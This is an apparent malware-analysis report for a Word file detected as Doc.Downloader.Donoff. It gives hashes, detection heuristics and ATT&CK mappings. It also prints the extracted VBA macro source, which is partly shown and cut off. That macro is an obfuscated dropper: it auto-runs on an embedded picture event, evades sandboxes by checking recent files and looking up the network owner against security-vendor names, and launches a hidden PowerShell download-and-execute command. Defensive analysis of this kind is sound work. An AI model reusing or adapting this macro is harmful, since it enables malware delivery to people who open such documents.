Doc.Downloader.Donoff — Office (OOXML) malware analysis

Static analysis result for SHA-256 513b0c9ca75d6c86…

MALICIOUS

Office (OOXML)

57.9 KB Created: 2016-08-31 11:22:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2019-04-18
MD5: 44400b377a6c7458bbc030700279912f SHA-1: 72a3e5500f0d82ee6fe73eab1dc3220440b11dd2 SHA-256: 513b0c9ca75d6c86ce9ae8010497b0a78c0737a3e64ae498dfef8667fcd47cfd
202 Risk Score

Malware Insights

Doc.Downloader.Donoff · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

This document contains VBA macros that leverage the CreateObject function to instantiate a COM object, likely for executing a second-stage payload. The reconstructed command string indicates an attempt to download and execute a file, potentially from a remote source. The ClamAV detection of 'Doc.Downloader.Donoff' further supports this analysis.

Heuristics 5

  • ClamAV: Doc.Downloader.Donoff-6755231-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Donoff-6755231-0
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4329 bytes
SHA-256: fb646767b0a6c341fc17c04cae46fb1ef30a4808c6203401c2c9b0230aaa1c85
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim zDlav As String
Dim szkCF As Integer
Dim JZCzxx As Boolean
Public Sub InkPicture1_Painted(ByVal eoWxm As Long, ByVal sKgziMY As IInkRectangle)
On Error GoTo xZFHq
If JZCzxx Then Exit Sub
JZCzxx = True
FvtbP
Exit Sub
xZFHq:
End Sub
Public Sub FvtbP()
If uTfvKjw Then Error 101
If QQhNk Then Error 102
Set YvyRX = CvOEb(CreateObject(d(124, 99, "ihStlrSWpec.l")))
MNoGPF YvyRX.Run(LeuHfAn, 0)
Exit Sub
End Sub
Public Function CvOEb(ByVal AdaZLn)
Set CvOEb = AdaZLn
End Function
Public Function kghYI() As String
kghYI = d(198, 635, "etnlyys-nwy dncmdore.eEciPi psWdSlHd oa wsle xuoocBa ioteie-mnpehlx-")
End Function
Public Function LeuHfAn() As String
LeuHfAn = kghYI & rldyMjS
End Function
Public Function rldyMjS() As String
rldyMjS = d(600, 1537, "o'bcEy]eO.tlsit eiet:aje.(pooftt(meec.ohl/f;-SfIT) enteicNoe$.m(yCo:ur3w l=aFetid/fs5OS.Shl-mnie/f,jrxs:NbN)euc/$cpceGmetD'anf) .$.t(tWwtvmi(ch)Oe;SblplceemlfPpNsla/.o6-W)[tiweeFpi")
End Function
Public Function OqNqk() As Integer
OqNqk = Application.RecentFiles.Count
End Function
Public Function uTfvKjw() As Boolean
uTfvKjw = 3 > OqNqk
End Function
Public Function QQhNk() As Boolean
zDlav = UCase(pIITYW)
For Each BlrEW In ybBvg
If InStr(zDlav, UCase(BlrEW)) <> 0 Then GoTo HsWpH
Next
Exit Function
HsWpH:
QQhNk = True
End Function
Public Function ybBvg()
ybBvg = Array(d(76, 41, "SaS HVO"), d(27, 87, "gAssemsBaLe"), d(85, 88, "DteaDcdie"), d(98, 113, "dCR reMONIT"), d(54, 29, "RTIOeTfN"), _
d(6, 23, "CCSOI"), d(33, 31, "ImTsaCEM"), d(57, 11, "rOfNeC"), d(11, 53, "OrItrop N"), d(12, 108, "edCr eATTNA"), _
d(11, 74, "O pAalLto"), d(21, 27, "RpTOoinR"), d(78, 39, "AtiPsOhl"), d(21, 109, "rtorcIMDnE"), d(45, 65, "trZhNee"), _
d(76, 59, "AKpcRCsaE"), d(108, 109, "etnEcATADR"), d(57, 55, "eSYTiRuc"), d(70, 94, "wSREAtutV"), d(168, 78, "nRoOlNogG ItEeSCsHt"), _
d(101, 73, "CfIEonpRtO"), d(36, 27, "VnNORegemT"), d(161, 57, "MtSaocpebCAourLkK"), d(25, 19, "RAYM"), d(108, 83, "caRETenADt"), _
d(51, 83, "STAvEner"), d(48, 89, "rCimTFOSo"), d(94, 57, "OS,pETsLE "), d(63, 39, "PSIHhC.DeE"), d(18, 29, "eslWabEe"), _
d(53, 65, "LOOHCs"), d(59, 65, "nOZAma"), d(18, 33, "dLuCo"), d(29, 62, "IfEyEER"), d(67, 27, "ItsohGN"), _
d(26, 41, "ElacSzR"), d(40, 73, "AmTUvvl"), d(45, 159, "ROwTeneSIDArapSK"), d(79, 37, "VsyiRTneIU"), d(120, 14, "eDiFETERDnB"), _
d(84, 23, "eCaBU otL"), d(98, 92, "MnoounsYA"), d(12, 19, "CEDImINe"), d(43, 41, "ohDETs"), d(96, 97, "opNrFiPoOT"), _
d(67, 27, "eLCuNRA"), d(78, 15, "aOCEuLbT"), d(27, 27, "ADSu"), d(107, 97, " sUnmrpd..tEtaE"), d(27, 17, "VrEsRE"))
End Function
Public Function pIITYW() As String
Set LykhZl = CreateObject(d(160, 279, "WetRWH..uHp1ntpqnt.isteit5"))
LykhZl.Open d(5, 20, "TEG"), d(227, 437, "eswx.g///t/mnmi.th:wmcevcmpwad/p1yt/.ioo2i"), False
LykhZl.SetRequestHeader d(54, 25, "rreeeRf"), d(401, 332, "/-weawndw/d.lrmoeacsxasmthietn-tdmp.ysc-:oi/mp/")
LykhZl.SetRequestHeader d(35, 33, "AetgrUe-sn"), d(277, 439, "TT/z.p;1iN to5me W ;nM/olE s1e)acbI;w.d0l(iS0o6i.l tM.d r6i0a 0n")
LykhZl.Send
If LykhZl.Status <> 200 Then Error 201
pIITYW = LykhZl.ResponseText
End Function
Public Function BdsnSrz(ByVal RCOQxjf As Integer, ByVal VoLhLw As String, ByVal YozKyX As Integer) As String
szkCF = yYAhhG(RCOQxjf, Len(VoLhLw))
Do While Len(BdsnSrz) < Len(VoLhLw)
BdsnSrz = BdsnSrz & yocwbVF(VoLhLw, szkCF)
szkCF = yYAhhG((szkCF + YozKyX), Len(VoLhLw))
Loop
End Function
Public Function yocwbVF(ByVal kQCYpW As String, ByVal szkCF As Integer) As String
yocwbVF = Right(MNoGPF(Left(kQCYpW, szkCF + 1)), 1)
End Function
Public Function yYAhhG(ByVal RClqrS As Integer, ByVal HrRNZ As Integer) As Integer
yYAhhG = RClqrS - (HrRNZ * (RClqrS \ HrRNZ))
End Function
Public Function d(ByVal RCOQxjf As Integer, B
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 18944 bytes
SHA-256: efe96b9b2d313ac0261cbb0207ba9073cf24969c44f94f03778c0d0325aacaad
Detection
ClamAV: Doc.Downloader.Donoff-6755231-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.